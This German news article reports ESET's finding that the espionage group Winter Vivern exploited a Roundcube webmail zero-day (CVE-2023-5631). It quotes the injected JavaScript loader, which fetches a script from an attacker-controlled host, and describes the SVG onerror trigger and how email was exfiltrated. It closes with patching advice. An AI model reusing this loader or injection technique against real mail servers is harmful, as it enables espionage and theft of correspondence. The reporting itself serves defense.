Nachdem Sie die technischen Details zu diesem Zero-Day-Angriff gelesen haben, der auf staatliche Stellen und eine Denkfabrik in Europa abzielte, und sich über den Bedrohungsakteur Winter Vivern informiert haben, erhalten Sie Tipps zur Eindämmung dieses Cybersicherheitsangriffs.
ESET-Forscher Matthieu Faou hat einen neuen Cyberangriff eines Cyberspionage-Bedrohungsakteurs namens Winter Vivern aufgedeckt, dessen Interessen mit Russland und Weißrussland übereinstimmen. Der Angriff konzentriert sich auf die Ausnutzung einer Zero-Day-Schwachstelle im Roundcube-Webmail. Das Ergebnis ist die Möglichkeit, Ordner und E-Mails in Roundcube-Konten aufzulisten und vollständige E-Mails an einen vom Angreifer kontrollierten Server zu exfiltrieren. Das Cybersicherheitsunternehmen ESET stellte fest, dass die Kampagne auf Regierungsstellen und eine Denkfabrik in Europa abzielte.
Springen zu:
Technische Details zu diesem Cyberangriff, der einen 0day in Roundcube ausnutzt
Der Bedrohungsakteur startet den Angriff, indem er eine speziell gestaltete E-Mail-Nachricht mit der Betreffzeile „Erste Schritte in Ihrem Outlook“ sendet und von „team.management@outlook(.)com“ stammt (Abbildung A).
Abbildung A
Am Ende der E-Mail enthält ein SVG-Tag eine Base64-codierte bösartige Nutzlast; Dies ist für den Benutzer verborgen, aber im HTML-Quellcode vorhanden. Sobald der schädliche Inhalt entschlüsselt ist, handelt es sich um:
Das Ziel des Schadcodes besteht darin, das onerror-Attribut auszulösen, indem er eine ungültige URL im x-Parameter verwendet.
Die Dekodierung der Nutzlast im onerror-Attribut führt zu einer Zeile JavaScript-Code, die im Browser des Opfers im Kontext der Roundcube-Sitzung des Benutzers ausgeführt wird:
var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);
Die JavaScript-Injektion funktionierte zum Zeitpunkt von Faous Entdeckung auf vollständig gepatchten Roundcube-Instanzen. Der Forscher konnte feststellen, dass sich diese Zero-Day-Schwachstelle im serverseitigen Skript rcube_washtml.php befand, das es nicht schaffte, „das bösartige SVG-Dokument ordnungsgemäß zu bereinigen, bevor es der von einem Roundcube-Benutzer interpretierten HTML-Seite hinzugefügt wurde“, wie von angegeben Faou.
Die Schwachstelle erfordert keine Interaktion mit dem Benutzer außer dem Anzeigen der Nachricht in einem Webbrowser, was möglicherweise erklärt, warum der Bedrohungsakteur keine sehr komplizierte Social-Engineering-Technik verwenden musste; Jeder angezeigte Inhalt löst den Exploit aus.
Nach dieser ersten Ausführung des JavaScript-Codes wird ein Loader der zweiten Stufe, ebenfalls in JavaScript entwickelt und mit dem Namen checkupdate.js, ausgeführt und löst die letzte Stufe aus, die wiederum in JavaScript geschrieben ist (Abbildung B).
Abbildung B
Die endgültige Nutzlast bietet dem Angreifer die Möglichkeit, alle Ordner und E-Mails im aktuellen Roundcube-E-Mail-Konto aufzulisten und E-Mail-Nachrichten über HTTP-Anfragen an einen Befehls- und Kontrollserver zu exfiltrieren.
Als TechRepublic Faou nach einer weiteren Kompromittierung des Systems fragte, antwortete er per schriftlicher Nachricht: „Wir haben keine seitliche Bewegung beobachtet. Der JavaScript-Code wird nur im Kontext des Browsers des Opfers im Roundcube-Fenster ausgeführt. Es hat also keinen Zugriff auf das Backend von Roundcube und das Entkommen aus dem Browser würde einen viel komplizierteren Exploit erfordern. Allerdings könnten sie ihren Zugriff erneut nutzen, um weitere Phishing-Kampagnen zu starten, die vom kompromittierten Absender ausgehen (wir haben dies nicht beobachtet).“
Wer ist Winter Vivern?
Winter Vivern, auch bekannt als TA473, ist ein Bedrohungsakteur durch Cyberspionage, dessen Interessen eng mit den Regierungen Russlands und Weißrusslands verbunden sind. Die erste öffentliche Aufdeckung des Bedrohungsakteurs Winter Vivern erfolgte im Jahr 2021, als er mehrere Regierungsstellen in verschiedenen Ländern ins Visier nahm, darunter Aserbaidschan, Zypern, Indien, Italien, Litauen, die Ukraine und den Vatikan.
Dieser Bedrohungsakteur hat in der Vergangenheit Webmail-Software ausgenutzt, da er bereits ältere Roundcube-Schwachstellen und bekannte Zimbra-Webmail-Schwachstellen missbraucht hat, um gewählte Beamte und Mitarbeiter in den USA sowie Experten für europäische Politik und Wirtschaft ins Visier zu nehmen. Der Bedrohungsakteur zielte auch auf Postfächer von NATO-nahen Regierungsstellen in Europa ab.
Der Bedrohungsakteur nutzt häufig bösartige Dokumente und manchmal eine PowerShell-Hintertür, um seine Ziele erfolgreich zu kompromittieren. Winter Vivern verwendet Schwachstellenscanner wie Acunetix, um gezielt Netzwerke zu scannen.
ESET stellte fest, dass beobachtet wurde, wie Winter Vivern CVE-2020-35730 ausnutzt, eine bekannte Roundcube-Schwachstelle gegen Entitäten, die auch vom Bedrohungsakteur APT28 angegriffen werden, der als Militäreinheit 26165 des russischen Militärgeheimdienstes, früher bekannt als, beschrieben wurde GRU.
Darüber hinaus wies ESET auf eine mögliche Verbindung zum Bedrohungsakteur MoustachedBouncer hin, der Angriffe gegen ausländische Diplomaten in Weißrussland durchführt. Darauf angesprochen sagte Faou gegenüber TechRepublic, dass „es ziemlich einzigartige Ähnlichkeiten in der Netzwerkinfrastruktur beider Gruppen gibt, was darauf hindeutet, dass eine gemeinsame Einheit diese für beide bereitstellen könnte.“
ESET erklärte zur aktuellen Bedrohung: „Trotz der geringen Ausgereiftheit des Toolsets der Gruppe stellt sie aufgrund ihrer Hartnäckigkeit, der sehr regelmäßigen Durchführung von Phishing-Kampagnen und der beträchtlichen Anzahl internetbasierter Anwendungen eine Bedrohung für Regierungen in Europa dar.“ werden nicht regelmäßig aktualisiert, obwohl sie bekanntermaßen Schwachstellen enthalten.“
So schützen Sie Benutzer vor dieser Cybersicherheitsbedrohung
ESET hat am 12. Oktober 2023 die Schwachstelle CVE-2023-5631 für Roundcube gemeldet; Roundcube hat es am 14. Oktober 2023 gepatcht und am 16. Oktober 2023 Sicherheitsupdates zur Behebung der Schwachstelle für die Versionen 1.6.4, 1.4.15 und 1.5.5 veröffentlicht. Es wird dringend empfohlen, Roundcube für diese Schwachstelle zu patchen.
Es wird empfohlen, alle Betriebssysteme und Software auf dem neuesten Stand und mit Patches zu halten, um weitere Gefährdungen zu vermeiden, die durch häufige Schwachstellen entstehen könnten.
Das Deaktivieren der JavaScript-Ausführung im Browser würde diese Bedrohung abmildern, allerdings auch die Erfahrung des Benutzers erheblich beeinträchtigen, da viele Websites für ihre Funktion stark auf JavaScript angewiesen sind.
Offenlegung: Ich arbeite für Trend Micro, aber die in diesem Artikel geäußerten Ansichten sind meine eigenen.
